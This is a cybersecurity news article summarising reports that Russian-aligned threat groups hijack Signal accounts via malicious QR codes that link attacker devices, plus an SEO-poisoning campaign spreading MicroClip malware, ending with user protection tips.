Cybercriminals aligned with Russia have been actively exploiting the linked devices feature in Signal, the popular privacy-focused messaging app, to gain unauthorized access to user accounts. According to Google Threat Intelligence Group (GTIG), these attacks use malicious QR codes to hijack accounts and intercept messages in real time.
Hackers Exploit Signal’s Linked Devices Feature
Signal allows users to link multiple devices, enabling seamless messaging across platforms. However, Russian-aligned threat actors, including UNC5792, have been abusing this functionality. By tricking users into scanning malicious QR codes, attackers gain access to victim accounts, allowing them to receive all incoming messages.
Once linked, the hacker-controlled device remains connected, giving cybercriminals persistent access to sensitive conversations. This technique is particularly concerning because victims may not realize their accounts have been compromised, as they continue to receive messages normally.
The Role of Malicious QR Codes
Attackers distribute these malicious QR codes using various deceptive tactics:
Fake group invitations
Fraudulent security alerts
Counterfeit device pairing requests mimicking legitimate Signal prompts
Phishing websites posing as trusted applications
Some phishing pages have been designed to appear as specialized applications for the Ukrainian military, targeting personnel involved in defense operations.
Notable Russian-Aligned Threat Actors Involved
UNC5792 and UNC4221
UNC5792 has been observed creating fake Signal group invitations hosted on attacker-controlled domains that closely resemble legitimate ones. Similarly, another group, UNC4221 (also known as UAC-0185), has deployed phishing campaigns targeting Signal accounts used by Ukrainian military personnel. These campaigns often involve custom phishing kits designed to mimic parts of the Kropyva application, which is used by Ukraine’s Armed Forces for artillery guidance.
Additionally, UNC4221 has employed PINPOINT, a lightweight JavaScript payload capable of gathering basic user information and geolocation data via phishing pages.
Other Russian Hacking Groups Involved
Sandworm (APT44): Uses WAVESIGN, a Windows Batch script, to target Signal users.
Turla: Deploys a lightweight PowerShell script for Signal account compromise.
UNC1151: Utilizes the Robocopy utility to exfiltrate Signal messages from infected desktops.
Broader Implications for Secure Messaging Apps
These attacks on Signal are part of a larger trend where threat actors exploit device-linking features in popular messaging applications. Microsoft recently reported that Russian hacking group Star Blizzard used a similar technique to hijack WhatsApp accounts through spear-phishing campaigns.
Furthermore, Microsoft and Volexity have identified Russian cybercriminals employing device code phishing tactics to infiltrate accounts on platforms such as WhatsApp, Signal, and Microsoft Teams. These techniques highlight a growing security threat to encrypted messaging services.
SEO Poisoning: A New Threat Vector
In addition to direct account hijacking, a new search engine optimization (SEO) poisoning campaign has been uncovered. Cybercriminals create fake download pages that impersonate popular applications like Signal, LINE, Gmail, and Google Translate. These pages distribute trojanized executables designed to infect Chinese-speaking users.
According to cybersecurity firm Hunt.io, these executables follow a consistent attack pattern:
Extracting temporary files
Injecting malicious processes
Modifying security settings
Establishing network communications
The malware, known as MicroClip, exhibits infostealer-like functionality, enabling attackers to harvest sensitive user data.
How to Protect Against These Attacks
Given the increasing sophistication of these cyber threats, users should adopt the following security measures:
Verify QR Codes: Never scan QR codes from untrusted sources or unsolicited messages.
Monitor Linked Devices: Regularly review linked devices in Signal settings and remove any unfamiliar ones.
Enable Two-Factor Authentication (2FA): Activate Signal’s Registration Lock feature to prevent unauthorized account access.
Be Cautious with Downloads: Always download Signal and other apps from official sources like the Apple App Store or Google Play Store.
Stay Alert for Phishing Attempts: Be wary of messages urging you to scan QR codes or enter sensitive information.
Conclusion
The exploitation of Signal’s linked devices feature by Russian-aligned hackers underscores the evolving threats targeting secure messaging platforms. As cybercriminals refine their techniques, users and organizations must remain vigilant against phishing attacks, malicious QR codes, and SEO poisoning campaigns. Strengthening security awareness and adopting proactive defense strategies will be crucial in mitigating these risks and safeguarding sensitive communications.
Follow us on 
(Twitter) for real time updates and exclusive content.
Interesting Article : Golang-Based Malware Uses Telegram to Evade Detection